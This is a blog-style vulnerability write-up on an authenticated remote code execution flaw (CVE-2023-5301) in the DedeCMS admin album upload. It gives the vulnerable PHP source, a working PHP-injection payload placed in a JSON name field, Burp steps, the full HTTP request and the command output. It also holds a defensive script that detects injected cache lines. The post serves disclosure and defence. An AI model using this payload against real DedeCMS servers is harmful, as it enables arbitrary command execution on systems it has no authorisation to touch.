Lamber's Blog

DedeCMS back-end (authenticated admin) code execution, CVE-2023-5301

Word count: 1.7k | Reading time: 9 min
2023/10/01

Root cause: request-controlled input is written unescaped into a .inc file that the application then include()s, so an attacker who can influence that input gets arbitrary PHP execution.
Vulnerable code:

<?php
// dede/album_add.php
...
if ($albumUploadFiles !== '') {
    // DedeCMS slash-escapes all request input on entry; stripslashes() undoes
    // that here, so single quotes in the JSON survive into $file['name'].
    $files = json_decode(stripslashes($albumUploadFiles), true);

    foreach ($files as $file) {
        $uploadTmp = DEDEDATA . '/uploadtmp';
        $tmpFile = $uploadTmp . '/' . $file['name'];

        $fileDir = $cfg_image_dir . '/' . MyDate($cfg_addon_savetype, time());
        CreateDir($fileDir);
        // $file['name'] is taken from the request as-is: no character validation
        $filePath = $fileDir . '/' . $file['name'];
        ...
        $fid = $dsql->GetLastID();
        AddMyAddon($fid, $filePath);

// include/userlogin.class.php
function AddMyAddon($fid, $filename)
{
    // one cache file per PHP session, under DEDEDATA/cache
    $cacheFile = DEDEDATA.'/cache/addon-'.session_id().'.inc';
    if(!file_exists($cacheFile))
    {
        $fp = fopen($cacheFile, 'w');
        fwrite($fp, '<'.'?php'."\r\n");
        fwrite($fp, "\$myaddons = array();\r\n");
        fwrite($fp, "\$maNum = 0;\r\n");
        fclose($fp);
    }
    include($cacheFile);   // executes whatever was appended on earlier calls
    $fp = fopen($cacheFile, 'a');
    $arrPos = $maNum;
    $maNum++;
    // $filename is interpolated into PHP source inside a single-quoted literal
    // with no escaping: a ' in the name ends the literal and the rest is code
    fwrite($fp, "\$myaddons[\$maNum] = array('$fid', '$filename');\r\n");
    fwrite($fp, "\$maNum = $maNum;\r\n");
    fclose($fp);
}
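Because AddMyAddon() only ever emits four line shapes, any other line in a data/cache/addon-*.inc file was injected. The triage script below, an added example that is not part of the original post or of DedeCMS, encodes those shapes as a regex and reports every line that does not match; the two sample file contents are constructed by hand to the writer's format (the fid values and image paths are made up), and the injected sample carries the exact payload used above.

```python
"""Triage DedeCMS data/cache/addon-<session>.inc files for injected PHP.

AddMyAddon() only writes four line shapes; anything else in one of these
files arrived through an unescaped $filename (e.g. the album_add.php
payload above). Added example, not DedeCMS code.
"""
import re
from pathlib import Path

# The exact line shapes AddMyAddon() emits. The path element may not contain a
# single quote or a backslash: either would end (or escape out of) the PHP
# string literal the writer builds.
LEGIT_LINE = re.compile(
    r"^(?:<\?php"
    r"|\$myaddons = array\(\);"
    r"|\$maNum = \d+;"
    r"|\$myaddons\[\$maNum\] = array\('\d+', '[^'\\]*'\);"
    r")$"
)


def scan_addon_text(text: str) -> list[tuple[int, str]]:
    """Return (line_number, line) for every line that is not writer-shaped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line == "":  # tolerate a trailing blank line
            continue
        if not LEGIT_LINE.match(line):
            findings.append((lineno, line))
    return findings


def scan_cache_dir(cache_dir: Path) -> dict[str, list[tuple[int, str]]]:
    """Scan every addon-*.inc under DEDEDATA/cache; report keyed by file name."""
    report = {}
    for inc in sorted(cache_dir.glob("addon-*.inc")):
        hits = scan_addon_text(inc.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[inc.name] = hits
    return report


# Constructed samples in the writer's format (fid and paths are made up).
CLEAN_SAMPLE = (
    "<?php\r\n"
    "$myaddons = array();\r\n"
    "$maNum = 0;\r\n"
    "$myaddons[$maNum] = array('120', '/uploads/allimg/230908/1-230908195503.jpg');\r\n"
    "$maNum = 1;\r\n"
)

INJECTED_SAMPLE = (
    "<?php\r\n"
    "$myaddons = array();\r\n"
    "$maNum = 0;\r\n"
    "$myaddons[$maNum] = array('121', '/uploads/allimg/230908/');system('ipconfig');//');\r\n"
    "$maNum = 1;\r\n"
)

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_SAMPLE), ("injected", INJECTED_SAMPLE)):
        for lineno, line in scan_addon_text(sample):
            print(f"{name}: line {lineno}: {line}")
```

Run `scan_cache_dir(Path("/path/to/DEDEDATA/cache"))` on a suspect install; a hit is worth treating as a confirmed web-shell write, since the file is include()d on every later AddMyAddon() call for that session.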

Exploitation

  1. Log in to the admin back end, choose "Content Maintenance" at the top right, click "Image Gallery" in the left-hand menu, then click "Add Document" in the centre pane (see screenshot).
  2. On the "Add Document" form, fill in the "Album Title", choose the "Album Main Category", and under manual upload pick a local image and upload it.
  3. Start Burp Suite with intercept on, catch the HTTP request sent when "OK" is clicked, change the value of the name field inside albumUploadFiles (at the position shown) to `');system('ipconfig');//`, and forward the request. The leading `');` closes the quoted path in the `array('$fid', '$filename');` line that AddMyAddon() writes, `system('ipconfig');` is then ordinary PHP, and `//` comments out the rest of the line.
  4. The response contains the output of ipconfig: the command ran on the server.

Two points a practitioner should keep in mind: this is a post-authentication issue (a logged-in back-end account that can publish albums), and the injected line persists in data/cache/addon-<session_id>.inc, where it runs again every time AddMyAddon() include()s that file for the same session.

Full HTTP request

POST /dede/album_add.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 4121
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://dedecms-57105.localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoNBMhAWA73UNeUq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=693db57bf5d85c42; PHPSESSID=0kckthapkrjb7jlhg207ovnit2; _csrf_name_8fc2d915=ee428983820312df1afe447e487e3dbd; _csrf_name_8fc2d9151BH21ANI1AGD297L1FF21LN02BGE1DNG=e2a21dd6e71d551c; DedeLoginTime=1694173153; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=1971781375dd7f27; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
Connection: close

------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="channelid"

2
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="cid"

0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imagebody"

粘贴到这里...
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="dopost"

save
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="maxwidth"

800
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="albumUploadFiles"

[{"name":"');system('ipconfig');//","remark":"something"}]
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="title"

rce
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="shorttitle"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="redirecturl"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="tags"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="weight"

108
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="picname"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="litpic"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="typeid"

13
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="typeid2"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="dede_addonfields"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pagestyle"

2
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="row"

3
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="col"

4
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="ddmaxwidth"

200
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pagepicnum"

12
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="isrm"

1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="zipfile"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="delzip"

1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="copysource"

http://
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="body"

<p>123123</p>
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="source"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="writer"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="notpost"

0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="click"

199
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="sortup"

0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="color"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="arcrank"

0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="ishtml"

1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pubdate"

2023-09-08 19:55:03
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="money"

0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="description"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="filename"


------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imageField.x"

44
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imageField.y"

17
------WebKitFormBoundaryfoNBMhAWA73UNeUq--

HTTP response

HTTP/1.1 200 OK
Connection: close
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 08 Sep 2023 12:02:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.6.9
Content-Length: 4344


Windows IP Configuration


Unknown adapter Appgate SDP:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.9.86
   Subnet Mask . . . . . . . . . . . : 255.255.255.255
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : TBMDT.COM

Ethernet adapter Ethernet 2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter VirtualBox Host-Only Network:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::3e32:8785:dc70:871f%22
   IPv4 Address. . . . . . . . . . . : 192.168.56.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Unknown adapter OpenVPN TAP-Windows6:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter Local Area Connection* 1:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter Local Area Connection* 10:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter VMware Network Adapter VMnet1:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::49f3:576f:5115:6188%8
   IPv4 Address. . . . . . . . . . . : 192.168.65.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter VMware Network Adapter VMnet8:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::3812:ae41:6c56:c806%11
   IPv4 Address. . . . . . . . . . . : 192.168.40.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Album published successfully!</title>
<link rel="stylesheet" type="text/css" href="/plus/img/base.css">
</head>
<body background='/plus/img/allbg.gif' leftmargin="8" topmargin='8'>
<table width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#DFF9AA">
<tr>
<td height="28" style="border:1px solid #DADADA" background='/plus/img/wbg.gif'>
&nbsp;<b>◇Article management::Publish album</b>
</td>
</tr>
<tr>
<td width="100%" height="80" style="padding-top:5px" bgcolor='#ffffff'>
<table width='100%' border='0' cellpadding='3' cellspacing='1' bgcolor='#DADADA'>
<tr bgcolor='#DADADA'>
<td colspan='2' background='/plus/img/wbg.gif' height='26'><font color='#666600'><b>Album published successfully:</b></font></td>
</tr>
<tr bgcolor='#FFFFFF'>
<td colspan='2' height='100'> <div style="line-height:36px;height:36px">
  Please choose your next action:
<a href='album_add.php?cid=13'><u>Continue publishing images</u></a>
&nbsp;&nbsp;
<a href='archives_do.php?aid=121&dopost=editArchives'><u>Edit album</u></a>
&nbsp;&nbsp;
<a href='/a/tuji/2023/0908/121.html' target='_blank'><u>Preview document</u></a>
&nbsp;&nbsp;
<a href='catalog_do.php?cid=13&dopost=listArchives'><u>Manage published images</u></a>
&nbsp;&nbsp;
<a href='/dede/content_i_list.php?channelid=2'>[<u>Remembered list page</u>]</a> &nbsp;
</div><table width='80%' style='border:1px dashed #cdcdcd;margin-left:20px;margin-bottom:15px' id='tgtable' align='left'><tr><td bgcolor='#EBF5C9'>&nbsp;<strong>Related content is being updated; please do not perform other operations until it finishes:</strong>
</td></tr>
<tr><td>
<iframe name='stafrm' frameborder='0' id='stafrm' width='100%' height='200px' src='task_do.php?typeid=13&aid=121&dopost=makeprenext&nextdo='></iframe>
</td></tr>
</table> </td>
</tr>
<tr><td bgcolor='#F5F5F5'>&nbsp;</td></tr></table>

</td>
</tr>
</table>
<p align="center">

<br>
<br>
</p>
</body>

</html>